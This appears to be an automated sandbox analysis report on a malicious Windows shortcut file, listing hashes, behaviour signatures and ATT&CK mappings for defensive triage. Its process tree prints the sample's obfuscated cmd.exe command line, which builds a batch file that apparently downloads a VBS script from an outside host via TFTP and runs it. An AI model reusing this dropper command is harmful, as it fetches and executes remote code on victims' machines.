e63f1f44e3da0d14390a7c05bba9e38eb8ed52743e0f9752e95bf5d7ae3c8a40

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
31/12/2023, 06:29

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

2bbe3332778a84d8e3ab3d5117fe3655.lnk
Size

1KB
MD5

2bbe3332778a84d8e3ab3d5117fe3655
SHA1

d20a81e686e325e0e92b92c6d76771beb6d80a77
SHA256

e63f1f44e3da0d14390a7c05bba9e38eb8ed52743e0f9752e95bf5d7ae3c8a40
SHA512

e790df2c27d6e943aa612feb69753a078c1a6939ef45a637e7e1285aaa7190ebd9aa9e368c396659641e651f3ebfbbdf0f10c7116dd826ea6405bfb1f9287892

Score

4^/10

Malware Config

Signatures

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\gA.BaT	cmd.exe
File created	C:\Windows\ga.bat	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2936 wrote to memory of 2644	2936	cmd.exe	17
PID 2936 wrote to memory of 2644	2936	cmd.exe	17
PID 2936 wrote to memory of 2644	2936	cmd.exe	17

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\2bbe3332778a84d8e3ab3d5117fe3655.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2936
- C:\WINDOWS\system32\cmd.exe
  "C:\WINDOWS\system32\cmd.exe" /c sET N=T r &EChO t%j%%q%e.%K%m GE%N%M.%H%s>ga.bat&eCHo StaRT M.%H%s>>gA.BaT&sET H=Vb&Set K=Co&sEt Q=W11&Set J=ftP &GA.BaT
  2⤵
  - Drops file in Windows directory
  PID:2644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\ga.bat

Filesize
41B

MD5
bf0cef991e7a605b46d6371ad036dbee

SHA1
5ed2fe324ca2742c75e416c2d9e0da5806e2b92e

SHA256
3eb8911abe3ab2cc576e4065888317ae06e9b523261e63a72506074a53827e8c

SHA512
03db655f9d5c58fb278c4eaaf22f601c19a9080d1dd52bcd1fc4fe0392b72c81e621d94b6fd7211d399f593eed81cdf089be0bc4173df2fdeb372255bf534679

Download Submit
memory/2644-58-0x00000000004A0000-0x00000000004A1000-memory.dmp

Filesize
4KB

Download